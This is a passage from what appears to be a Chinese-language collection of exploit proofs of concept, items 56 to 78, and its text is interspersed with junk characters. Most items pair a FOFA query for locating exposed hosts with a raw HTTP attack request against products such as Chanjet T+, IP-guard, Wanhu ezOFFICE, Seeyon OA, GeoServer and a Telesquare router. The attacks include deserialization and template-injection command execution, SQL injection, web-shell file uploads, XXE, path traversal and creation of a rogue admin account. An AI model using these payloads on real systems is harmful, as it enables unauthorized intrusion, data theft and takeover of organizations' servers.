/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers3 h3 @  H1 ?7 G1 z. u  j: l, a$ ~

+ x6 N. J- y, O! t) B, O* b56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE: [  g) H$ W& Q7 g
FOFA: app="畅捷通-TPlus"
  O: g$ ?; ^9 C" N4 V8 BPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1' V! Q' M6 ^/ h/ D+ |5 q1 h% g+ _  h
Host: x.x.x.x( B3 }: N3 i8 u8 d; m. |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36. m$ u6 Z: x4 q6 [
Content-Type: application/json: }/ f' M, R1 B' T% ], l9 k  R/ B

6 k3 a3 K. W. o- ?{
( e. O% o/ h' ]0 A. A& S1 A  "storeID":{
3 ?( c/ B& m( B    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
+ b, u) [- ?0 o2 u5 u. }   "MethodName":"Start",* ^0 X9 @* p" U& }. V$ j1 K! Q
    "ObjectInstance":{
8 U! T& M+ a0 c4 h3 C       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",9 b4 v. k2 n3 U
        "StartInfo": {
( U) t! g- |+ c) ?) u* `, b% C+ |2 Y           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
! j; q  c$ _* z4 E, t           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw": a* K/ j) b0 v" _
       }
( N! N% i: [0 f7 G6 n  d2 e    }; K$ Y; l8 R$ e$ E0 `) C
  }
& A- B7 M. ?4 R}5 \' }* [" v. r$ ]; l; x

$ V& f* o' I: I( l& C! o2 k
$ u9 `' ~3 _; L! q: S5 h57. 畅捷通T+ keyEdit.aspx SQL注入1 Y/ f' d, G" b2 ?
FOFA:app="畅捷通-TPlus"1 F& Y# ]; M5 U9 ?0 i% y# e
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
* {5 U: v9 f# \1 ~7 i* ?1 HHost: host/ n( d' y  B/ N+ l" {: n
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
" w6 u- g& j* h( M9 e) |Accept-Charset: utf-8
8 [  s% ?2 P8 w1 UAccept-Encoding: gzip, deflate6 S$ h4 X( s- B% q
Connection: close, s7 ?% v" |, ~6 L' `, l' T' {( R
# ?/ Y7 n* {# N. q: B

% T0 t% x; c& r1 C4 F5 C6 d) `& m58. 畅捷通T+ KeyInfoList.aspx sql注入
2 t$ ^9 j# H. Y! q5 H  BFOFA:app="畅捷通-TPlus"
% T* a# ~. o/ ^/ yGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1! V- s- t6 d: `: i% C& ?3 m8 ?5 y' ~# ]
Host: your-ip7 o$ ^4 X$ T/ _2 U% _% G8 f; d
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.360 M1 {# P0 ^7 [! H
Accept-Charset: utf-8( U! f: x# P7 K6 I
Accept-Encoding: gzip, deflate9 l- y+ {; z4 V1 f
Connection: close7 ?, J, t+ D% l/ m# p& k8 @9 [
) o, ?! B9 Z% ~4 [; @% h0 ~# a

: g; y/ F6 P+ N( Y% @: }, c59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行$ ^/ Z2 \# [7 n1 J' G, K
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"0 |5 `1 L& a1 T7 f1 X
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
# d, h7 q5 S% `2 p, A& _6 r; _7 UHost: 192.168.86.128:9090
7 q6 w# g. d9 A+ r* iUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
5 f5 D! U4 d& j8 f! D" c" h1 Z2 d, DConnection: close
  v2 \% x9 H, t! CContent-Length: 1669& ?) }: z" M$ |( E6 F, G% j  K
Accept: */*; d3 L5 ^' _3 S7 f/ C5 I3 n
Accept-Language: en
& _$ p  z# g! y7 l0 LContent-Type: application/x-www-form-urlencoded
- N  U, k1 p$ J+ [, NAccept-Encoding: gzip  f& e6 m+ M) T. z9 d
) [# e4 O# N. {& W
PAYLOAD! {4 {" w% e6 c/ i
8 n' F1 {, R6 m7 d, M

2 Q9 ?5 s3 n9 U% ^9 |' a8 `6 ^60. 百卓Smart管理平台 importexport.php SQL注入: T' F9 w: r, V  X
FOFA:title="Smart管理平台"
7 x" m. q- ?( F: T: ]GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
1 e6 ~+ b0 ~" R  e. c1 `' F/ Y2 ]Host:; _7 c+ E6 S4 ?6 C6 `, ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 O! s+ b1 L1 D. X& k5 }4 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) W: t; z2 u' y. e2 TAccept-Encoding: gzip, deflate
% g4 Y9 {7 H$ G2 j7 ~9 lAccept-Language: zh-CN,zh;q=0.9! W5 C7 x3 A% r0 `
Connection: close
5 ~+ K; p8 Q. e4 M) b
1 X# x5 {4 D+ V/ A, C% u: e3 a4 l5 f% i& x$ ?4 F; T) a
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传, x* g' g" G/ o5 V) f9 {* X" E
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
3 |7 W$ U+ N9 D2 RPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1  t0 k" b5 y0 F+ Y+ P
Host: x.x.x.x
7 ]5 E% C2 G! Q; pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) v8 ]3 C: |" |: O$ X' i" [+ Y
Connection: close
  q+ U' s6 Q% p) hContent-Length: 27
2 e* l4 ^* ^- v1 hAccept: */*: K$ O5 E- A/ e* u
Accept-Encoding: gzip, deflate: N* h0 ^! @7 k& G1 ~! L
Accept-Language: en
. |9 b% T2 h; nContent-Type: application/x-www-form-urlencoded
+ b- Y1 J' F( F3 v2 c7 L0 U; ^) L7 t' I- N% l$ N
8uxssX66eqrqtKObcVa0kid98xa
! |+ k$ W" H9 ~$ J% E1 o0 _
( s6 u$ w/ a  b" w+ X+ M8 r8 D  r% v- n
62. IP-guard WebServer 远程命令执行  a+ v2 T1 n; ]/ M, A( R8 [6 ^
FOFA:"IP-guard" && icon_hash="2030860561"/ h7 w+ S# y; _4 f0 m9 g- t
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.19 D: b7 w& ~+ h
Host: x.x.x.x
# ^- b7 W) q0 A( L: r6 q, EUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
! c. r- }/ h7 ~- g* U5 ]- ^1 J5 |Connection: close
9 z! ], t: ]7 P0 kAccept: */*
  o! y5 ~1 A9 }: N) O, lAccept-Language: en& Q4 q! [2 p' K
Accept-Encoding: gzip3 H- s, W; a5 ~3 T

, b" s  T3 X4 h5 m; g. F3 b/ Q# b+ V1 j# v% x- Q# k
访问
/ ~9 W% Z9 z/ G/ _" @
, x% a' n5 P- CGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1- {% w' Y/ ?/ R1 l
Host: x.x.x.x
+ G7 [& W1 J& v1 J; L# `$ j/ s
5 M! p, x4 @  Q6 A) u" u" N- K! i. c
63. IP-guard WebServer任意文件读取
1 X5 W! L4 Z9 k+ n: Q; MIP-guard < 4.82.0609.0! V/ W! N5 r/ ^
FOFA:icon_hash="2030860561"
% {) A& l* E5 v$ o- w* cPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
; _2 r. ]5 \1 HHost: your-ip
3 Y9 C3 g2 U/ H" M# W" d; F9 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
* m9 c4 t) T: C: {+ iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 d7 v, w4 E& T+ K
Accept-Encoding: gzip, deflate) o: e/ O7 P( K7 b
Accept-Language: zh-CN,zh;q=0.9; H& K* Y2 x" Z/ R
Connection: close
. ]4 g! u  W) @1 LContent-Type: application/x-www-form-urlencoded
8 m% N+ d$ K' i9 r
; H8 Z. [/ c9 A, t1 S6 _/ bpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
8 s6 G# K( |& A4 ^% j
  I% B9 X& U: N$ P* s64. 捷诚管理信息系统CWSFinanceCommon SQL注入9 v9 D8 g6 D% Y) t! K; P
FOFA:body="/Scripts/EnjoyMsg.js"
/ ~- T! H, r9 o) q+ A5 \POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1! m& a2 ^4 N( j" ]; ^$ L, W" ]$ F& H
Host: 192.168.86.128:9001
# `1 m; |/ Q8 E" xUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
/ A( R- m6 r; ^/ |Connection: close
$ `1 D+ V5 H/ x/ u" [: i1 RContent-Length: 369
1 h  K3 Y# B$ F5 ?: lAccept: */*
5 f2 W! i7 [3 @Accept-Language: en
: }2 ~8 n/ F+ y) u/ |( XContent-Type: text/xml; charset=utf-8% S1 R9 ?  T+ Y2 \0 y9 V. w7 v
Accept-Encoding: gzip
, a+ L7 ~/ D% C- @
! U. F  p) n* C1 M0 i9 ]! @2 U9 T: A6 e<?xml version="1.0" encoding="utf-8"?>" a5 F# ]" [$ j% `) I# q
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">. f: J! S, e7 o- _; j
<soap:Body>
: h" Y( y- J9 [  V7 X    <GetOSpById xmlns="http://tempuri.org/">
: O" V! |' u! F9 z1 |      <sId>1';waitfor delay '0:0:5'--+</sId>
! P7 K6 n  g( V$ {    </GetOSpById>3 q$ h' f4 L0 ^1 g# O# t9 J4 u
  </soap:Body>
/ P9 A$ {# d7 n1 W" m</soap:Envelope>/ }' G( E, |5 x& r. I  Y

1 i8 z* M3 M! z% t4 Z0 v/ a, O% k6 |; u" @+ c4 Y
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
* I. E7 a9 t) bFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"8 B4 B# E$ u( `! m& ^4 U
响应200即成功创建账号test123456/1234564 r, v' A; `# ]4 `; U
POST /SystemMng.ashx HTTP/1.1& G( n, c% [4 P( v  V9 a4 Z
Host:
* k$ Q8 d" t/ v/ h! ^  jUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
7 [7 P! z. K& @! p: W! ~Accept-Encoding: gzip, deflate; h% ]! ^1 Z6 ?* \  H
Accept: */*
% n% ]+ |! C% [5 I7 I, J- jConnection: close: @0 a4 b; H3 F/ J' E
Accept-Language: en" w4 `# Q( G3 o3 W( v& d: {
Content-Length: 174
" e3 [" Q, {* r* p
- K+ x: B& T: coperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators; v+ C: D* @  s7 N' _

7 v; K# k1 ~, n% ?. X! |5 [. w8 e
* y2 u" E4 n9 B5 Y5 G& g7 T$ a% |66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
* J$ k$ \  Q9 k$ B# ]/ g2 ^) i2 d5 BFOFA:app="万户ezOFFICE协同管理平台"% P! Y" \1 V, @
9 w: |8 V7 [- L9 g# \* p. u
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
; T  G1 n5 k3 \# p2 ?3 @! K0 hHost: x.x.x.x5 k8 q$ ]' ?) `3 k0 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36$ S5 |& L! ^! a" P% p
Connection: close
9 n# _: d4 w. O) ~* tAccept: */*# g0 r' f& M7 L4 i# N, n5 M! u
Accept-Language: en6 ~$ A( ~# j; }
Accept-Encoding: gzip
% c, {& }# B8 t. o- q. ]2 @0 I
/ w# `$ X3 F& Y- a6 C! @: i. K
8 D# Q3 N* B6 Y9 ?第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
9 j& ^. l1 m1 |. W$ `  P3 P5 P, C' g- T. o5 ?
67. 万户ezOFFICE wpsservlet任意文件上传* K: u- D1 H# \1 O  n
FOFA:app="万户网络-ezOFFICE"
/ Z7 b" @. j! a$ A" KnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型2 ^1 W  F  E7 ?" M7 n* ?
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.14 m  U2 [0 \/ O  W0 {- Q
Host: x.x.x.x1 y" C; b+ p; F: W) I
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.04 z* L+ p, d: \! M3 z+ U
Content-Length: 173
$ |/ e, B3 A+ P/ H4 P9 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.81 F2 z0 s9 [, n
Accept-Encoding: gzip, deflate% O& D2 W' N- n! n
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- V/ ^( ~3 Q9 g, z* }0 BConnection: close( k4 ~4 ^- w% o* S9 D/ _$ I
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp/ C& L% Q) L3 X2 e8 _7 C) P  c
DNT: 1
( [2 p' B, F5 L# N% NUpgrade-Insecure-Requests: 16 E+ R' d5 b& q) S4 Y4 }
  p# }! s0 f* ?
--ufuadpxathqvxfqnuyuqaozvseiueerp
+ G3 i5 s9 b" p; L9 g4 u# fContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"- H' N% ~0 U, |$ `. O: @
5 ~0 p1 m3 G7 N+ N
<% out.print("sasdfghjkj");%>/ Y" @; ~' Z3 ?
--ufuadpxathqvxfqnuyuqaozvseiueerp--% F+ c5 [- S# o% a1 Z

: D* ~8 I0 s9 A* [3 _$ t7 S& T+ I% J' R( z" ]+ ~2 \% C8 x
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp, l& X$ M1 d7 L0 ?

1 M; [: H0 B  g, _3 V. {68. 万户ezOFFICE wf_printnum.jsp SQL注入: n3 g; t4 ^: a/ w3 |
FOFA:app="万户ezOFFICE协同管理平台"2 B6 J- N" N  J
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
! y4 n5 ?# s, [/ R( i4 e+ Y% rHost: {{host}}8 k. }7 x# ^# o% b' E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
; X0 x( `7 l( w- e9 \Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
, ^3 a5 Z! j# L5 WAccept-Encoding: gzip, deflate: V3 @7 l0 ?2 V) @/ l6 n4 ~
Accept-Language: zh-CN,zh;q=0.9
) |, v7 U5 k. J7 D7 [. ^. }Connection: close: O4 l, t- B! N5 `/ W# L! S/ N2 H0 h
  A6 _) F$ s" [7 Y  G5 ~
) b3 }, a' A  J- g# ]" V
69. 万户 ezOFFICE contract_gd.jsp SQL注入
! G0 {: B9 V* n3 D+ aFOFA:app="万户ezOFFICE协同管理平台"
# ~1 x! f' A  E0 P, u1 J& A# _GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
! C! E- R/ }; Z* f  J- J  wHost: your-ip
4 g" X+ V+ e- U) H4 M) IUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
3 B( A$ T: H- E9 x" Z: ~: EAccept-Encoding: gzip, deflate/ i" h( I2 ?. X# b4 n* F% K6 G
Accept: */*+ m4 z- O6 j9 n0 u" n) A* C
Connection: keep-alive
( y+ z3 y% u3 |- b" f5 G, c# J
  @2 M$ N% i2 z4 m8 P9 C
70. 万户ezEIP success 命令执行
# Q& W) R, n+ T- H+ NFOFA:app="万户网络-ezEIP"
& F: I: s: z4 Y. ]$ [( y( QPOST /member/success.aspx HTTP/1.1* F9 M5 Q1 z7 G# r
Host: {{Hostname}}
# K6 z! R3 H, M$ i* p1 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
4 j; i! r+ R9 y! U+ ?SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=* E$ A4 L! h- q" r7 k0 l
Content-Type: application/x-www-form-urlencoded  l" ]$ j- d; h/ C
TYPE: C
+ I. J, H, {/ `0 TContent-Length: 16702% Z7 }# D$ R) h* z
5 `% \( F' D8 S) J% l
__VIEWSTATE=PAYLOAD
: s$ r- T' ^+ [2 N% B0 F
& q- ^& _0 x/ J8 D6 o, }& Q5 ^
* A7 z, M+ A1 I71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
* L3 |0 B0 D1 A" \( a- @" |FOFA:body="PM2项目管理系统BS版增强工具.zip", ?' k; K% E- @/ B) w
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
  y5 w4 L$ ]  f! u7 z. n) q- FHost: x.x.x.xx.x.x.x. p; _+ h% R! o3 i
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.366 E# j. Y) H; o5 S4 R& Z8 v& J, E
Connection: close. B, H8 @; m" s% l* P) p; G5 q' q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  R" d: T+ f$ H
Accept-Encoding: gzip, deflate- e. x% f& Z! s/ ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: _& a& {5 l# K+ C0 ^" I" x
Upgrade-Insecure-Requests: 1* @# j9 q( y0 x0 S9 P7 Z8 ~& l

9 ^6 N7 i* l3 d/ u/ @$ s
( ?  Z  M% S  L72. 致远OA getAjaxDataServlet XXE  }8 z3 H/ h9 r8 p- G0 u7 _' p! J8 \/ O
FOFA:app="致远互联-OA"
( N- l4 A, U; DPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.10 I; `* B9 Q5 }: @3 M. F& t9 q
Host: 192.168.40.131:8099
# n% b/ S4 s: L5 XUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36- |2 ^& N/ l: m0 b5 o
Connection: close
2 Q# ~# W, t; B$ hContent-Length: 583' R* q. O3 n$ Z" Q
Content-Type: application/x-www-form-urlencoded% W0 e( g+ U! a. J- R
Accept-Encoding: gzip4 f7 F4 C2 L) s0 s

2 ?" O" W7 Y2 j5 \8 x  TS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
& a( Z8 M7 J. N2 m4 q4 X
- D: ^( S7 T, ^! L2 t( |
, _4 d5 T( C! I$ ?73. GeoServer wms远程代码执行8 `6 t9 X7 \$ b$ ^) w+ Q/ O
FOFA:icon_hash=”97540678”8 F5 h% s7 X' F5 M
POST /geoserver/wms HTTP/1.1' J- J# J3 G# M# X, a9 ^
Host:1 {  I2 u- C2 l3 c. [9 \( m& M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ s7 V5 g* T9 Y; M
Content-Length: 1981( r. n4 _, p' e( |7 G; }: S3 \
Accept-Encoding: gzip, deflate
; \2 N$ Y  x2 c2 @+ ?# UConnection: close" F, O# j, x) e+ G$ `0 I
Content-Type: application/xml
' o1 e6 ~4 A% C* YSL-CE-SUID: 3% w. N5 U9 L; q( W
7 m+ N# I6 j& |% r) ]8 w* C
PAYLOAD% W3 |. ^. T; T4 ]

$ ~7 W/ b  Q* T) s. S0 j1 b) K) I" Z: _; }/ T# I
74. 致远M3-server 6_1sp1 反序列化RCE; G3 }) o5 R6 D! |. L- O' n: h
FOFA:title="M3-Server"
$ r6 _0 G+ g$ R5 b) r3 p& IPAYLOAD
- p0 B- N8 w2 p# D# u9 p7 e5 X3 J2 K- t3 W4 n7 p; a& A9 m
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
2 D# R5 z" n; }FOFA:app="TELESQUARE-TLR-2005KSH"
1 K, H5 D6 v5 q, ~; A5 d: TGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.12 ~, U8 {& s7 s) p* C/ Y
Host: x.x.x.x$ J' j1 E& ^$ r5 o6 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# T* F* t) b* w% q5 B0 RConnection: close
. v* U. g; \% r$ O' rAccept: */*" ]% B/ s" T8 m. G0 R
Accept-Language: en
# Z- b4 ^6 K- l/ v& P- b" @% `Accept-Encoding: gzip4 \& a$ H3 P9 D9 R3 T
( c" P: d- }7 l6 `5 ^9 @) K
. k- v7 N( d7 y. b; V2 a
GET /cgi-bin/test28256.txt HTTP/1.1
3 g7 N( k5 J- O0 L( r; `# DHost: x.x.x.x
1 [# m! y5 C! H  G. R: n, |, x6 X' \3 W+ P- w5 {% G

5 `3 R/ y( M; t& G: O& K5 h5 A! U76. 新开普掌上校园服务管理平台service.action远程命令执行
. v/ V* t2 v4 |9 ?& a* oFOFA:title="掌上校园服务管理平台"
+ S; u" @4 i$ V, _, |POST /service_transport/service.action HTTP/1.1
7 [. t, F% E/ q/ ~7 R( i. m; H5 k& [Host: x.x.x.x: Y4 g5 h; r# p7 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
6 B" D& A4 x4 f* s, H' Z# V6 o% SConnection: close. z; }" L! V  ^$ D4 d
Content-Length: 211/ f  Y' R  s9 k- H+ s8 m3 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ A5 h8 q# v: d8 L0 wAccept-Encoding: gzip, deflate
0 H8 \- u. X5 d8 ^, A0 kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 B! D" t$ P, C* J3 W& \; S
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4+ `% c* Q" s+ B% ]! B; O
Upgrade-Insecure-Requests: 1  D2 m! `1 m/ g. }1 Z" ?
( ]0 F' B+ Y* T! s6 x
{, K% b; X0 W  v9 H5 i
"command": "GetFZinfo",+ P0 Y( f( t5 M
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
6 r3 s3 M9 D+ X* \5 T  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"! f  i. A+ ]9 I# p
}
" ~! _5 b: N1 d
+ \) ~, ?4 t  {4 p* N
8 g( W$ j  I; m& uGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
0 R. ~0 b8 {6 e2 dHost: x.x.x.x
/ {. Q2 \$ p. u: Y6 E5 p
3 S6 {$ x  p3 V- e0 Z- s" M1 q
* C% r8 ], s1 Y. a6 q9 g3 Q7 V, H; E. N  |
77. F22服装管理软件系统UploadHandler.ashx任意文件上传# s* b( z# O; h9 t* s: d" E7 L
FOFA:body="F22WEB登陆"
) m( C% t/ p8 b) x3 c; c- t& o2 XPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
! K$ l) N) s; P: S! F5 u/ JHost: x.x.x.x. O1 K: z; ]/ \# L+ Q1 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36) N8 t; J# _9 A9 q
Connection: close
0 n/ e' j  R( L* ]  `" b& ?Content-Length: 433
$ N  o9 l, \3 l3 ]Accept: */*
. p" G  H, r0 x6 H8 P+ iAccept-Encoding: gzip, deflate0 I) V# s$ @% o8 l
Accept-Language: zh-CN,zh;q=0.9( w% o* L; l! N
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix5 o5 x) x) @% q3 `% O  i7 ?! C. }

  [1 T6 v) |- c- b; M" _* M/ S8 _------------398jnjVTTlDVXHlE7yYnfwBoix
1 S9 n& R. w. ^+ s+ m  DContent-Disposition: form-data; name="folder"# y- D  r0 D2 F/ D* m
, x! l" j) I$ u4 U3 T* V# L7 m3 M
/upload/udplog
; f" t$ H9 p: z. F. g( X. S------------398jnjVTTlDVXHlE7yYnfwBoix
0 Z) k% }& W  V4 s; zContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
. e2 _4 G1 X$ F- _5 ZContent-Type: application/octet-stream
; R3 ~: a+ C! h3 ]. ]
- _. a0 F% V' I9 H) u4 I# Shello1234567
9 g* e# a: Z  N------------398jnjVTTlDVXHlE7yYnfwBoix
$ m7 u) t( N' J8 HContent-Disposition: form-data; name="Upload"
( ^8 R5 G8 i( \1 l4 V4 {7 |9 C: V3 w  j6 g' _% j9 s, X
Submit Query
3 N9 `' K/ }2 ^; ]9 K1 g1 j0 x------------398jnjVTTlDVXHlE7yYnfwBoix--
; M# i& k# |! f! h; k9 T& X9 n; d8 a# d4 g
6 o6 s6 E+ w4 t
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传4 N( t1 h( y) Q6 j: s
FOFA:icon_hash="2001627082"& e2 @  M: l# M0 p
POST /Platform/System/FileUpload.ashx HTTP/1.1
: t3 E, X( A, g+ \" IHost: x.x.x.x% s; C$ i, `) c2 `8 |5 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* j( ]+ @+ W" F8 }Connection: close4 w+ G9 W! }7 U
Content-Length: 336
1 v8 t: d9 u- [7 tAccept-Encoding: gzip8 L% d/ e  V1 ]# x4 }
